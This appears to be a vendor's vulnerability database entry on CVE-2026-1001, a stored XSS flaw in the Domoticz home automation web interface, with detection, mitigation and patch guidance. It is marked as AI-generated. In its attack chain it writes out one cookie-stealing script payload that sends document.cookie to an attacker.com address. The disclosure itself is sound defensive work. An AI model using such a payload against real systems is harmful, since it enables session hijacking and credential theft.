The SentinelOne Annual Threat Report - A Defenders Guide from the FrontlinesThe SentinelOne Annual Threat ReportGet the Report
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • AI Data Pipelines
      Security Data Pipeline for AI SIEM and Data Optimization
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2026-1001

CVE-2026-1001: Domoticz Stored XSS Vulnerability

CVE-2026-1001 is a stored XSS vulnerability in Domoticz web interface that lets authenticated admins inject malicious scripts via hardware and device names. This article covers technical details, affected versions, and mitigations.

Published: March 27, 2026

CVE-2026-1001 Overview

CVE-2026-1001 is a stored cross-site scripting (XSS) vulnerability in Domoticz, a popular open-source home automation system. The vulnerability exists in the Add Hardware and device rename functionality of the web interface, allowing authenticated administrators to inject and execute arbitrary scripts by supplying crafted names containing script or HTML markup. Malicious code is stored and subsequently rendered without proper output encoding, causing script execution in the browsers of users viewing the affected page and enabling unauthorized actions within their session context.

Critical Impact

Authenticated attackers can persist malicious JavaScript that executes in the context of other users' browser sessions, potentially leading to session hijacking, credential theft, and unauthorized administrative actions within the Domoticz home automation environment.

Affected Products

  • Domoticz versions prior to 2026.1

Discovery Timeline

  • 2026-03-25 - CVE-2026-1001 published to NVD
  • 2026-03-26 - Last updated in NVD database

Technical Details for CVE-2026-1001

Vulnerability Analysis

This stored XSS vulnerability (CWE-79) arises from improper neutralization of input during web page generation in Domoticz's hardware configuration and device management interfaces. The application fails to properly sanitize user-supplied input when administrators create or rename hardware devices, allowing script tags and HTML markup to be persisted in the database. When other users navigate to pages displaying these device names, the unsanitized content is rendered directly in the DOM, causing the injected JavaScript to execute within the victim's browser session.

The attack requires network access and relies on an authenticated administrator to inject the payload, with subsequent user interaction needed when victims view the affected pages. While the vulnerability is classified as medium severity due to these prerequisites, successful exploitation can lead to significant impacts on the confidentiality and integrity of user sessions in the subsequent system.

Root Cause

The root cause is insufficient output encoding in the Domoticz web interface when rendering hardware names and device identifiers. User-controlled input submitted through the Add Hardware and rename device functionality is stored without adequate sanitization and later displayed without proper HTML entity encoding, allowing script injection payloads to be interpreted as executable code by the browser.

Attack Vector

An authenticated administrator with access to the Domoticz web interface can exploit this vulnerability through the following attack chain:

  1. The attacker authenticates to the Domoticz administrative interface
  2. The attacker navigates to the hardware configuration section (Add Hardware functionality) or device rename feature
  3. The attacker supplies a malicious device name containing script or HTML markup (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>)
  4. The crafted payload is stored in the application database
  5. When other authenticated users view the hardware list or device information, the malicious script executes in their browser context
  6. The attacker can harvest session tokens, perform actions on behalf of victims, or redirect users to phishing pages

Since this vulnerability requires administrative privileges to inject payloads, the primary risk scenario involves compromised administrator accounts, malicious insiders, or multi-tenant environments where multiple administrators have access to the same Domoticz instance.

Detection Methods for CVE-2026-1001

Indicators of Compromise

  • Unusual device or hardware names containing HTML tags, JavaScript event handlers (e.g., onerror, onclick), or <script> elements in the Domoticz database
  • Web server access logs showing requests with encoded script payloads targeting hardware configuration endpoints
  • Browser console errors or unexpected network requests to external domains when viewing Domoticz interface pages
  • Reports of unexpected behavior or redirects from users accessing the Domoticz web interface

Detection Strategies

  • Implement web application firewall (WAF) rules to detect and block XSS payloads in POST requests to hardware management endpoints
  • Deploy browser-based security solutions that can detect and prevent malicious script execution
  • Monitor Domoticz database tables for entries containing suspicious HTML/JavaScript markup in name fields
  • Review administrator activity logs for unusual hardware creation or device renaming operations

Monitoring Recommendations

  • Enable and centralize logging for all Domoticz administrative actions, particularly hardware configuration changes
  • Configure Content Security Policy (CSP) headers to restrict inline script execution and report violations
  • Implement real-time alerting for database entries matching XSS patterns in user-controllable fields
  • Monitor outbound network connections from client browsers for unexpected data exfiltration attempts

How to Mitigate CVE-2026-1001

Immediate Actions Required

  • Upgrade Domoticz to version 2026.1 or later immediately to remediate this vulnerability
  • Audit existing hardware names and device configurations for malicious script content and sanitize any compromised entries
  • Review administrator account access and enforce principle of least privilege
  • Consider implementing additional network segmentation to restrict access to the Domoticz administrative interface

Patch Information

Domoticz has addressed this vulnerability in version 2026.1. The patch implements proper output encoding for hardware names and device identifiers rendered in the web interface, preventing stored XSS payloads from executing. Organizations should upgrade to this version as soon as possible.

For detailed information about the fix, refer to the Domoticz Version 2026.1 Release notes. Additional technical details are available in the VulnCheck Advisory on Domoticz XSS.

Workarounds

  • Restrict administrative access to the Domoticz web interface to trusted users only via network-level access controls
  • Deploy a reverse proxy or WAF in front of Domoticz to filter XSS payloads in incoming requests
  • Implement strict Content Security Policy (CSP) headers that prevent inline script execution
  • Disable or restrict access to hardware configuration features until the patch can be applied
  • Regularly audit hardware and device names in the database for suspicious content

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeXSS

  • Vendor/TechDomoticz

  • SeverityMEDIUM

  • CVSS Score4.8

  • EPSS Probability0.07%

  • Known ExploitedNo
  • CVSS Vector
  • CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
  • Impact Assessment
  • ConfidentialityLow
  • IntegrityNone
  • AvailabilityNone
  • CWE References
  • CWE-79
  • Technical References
  • Domoticz Version 2026.1 Release

  • VulnCheck Advisory on Domoticz XSS
  • Latest CVEs
  • CVE-2026-40322: SiYuan Knowledge Management RCE Vulnerability

  • CVE-2026-40318: SiYuan Path Traversal Vulnerability

  • CVE-2026-40259: SiYuan Auth Bypass Vulnerability

  • CVE-2026-40255: AdonisJS HTTP Server CSRF Vulnerability
Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English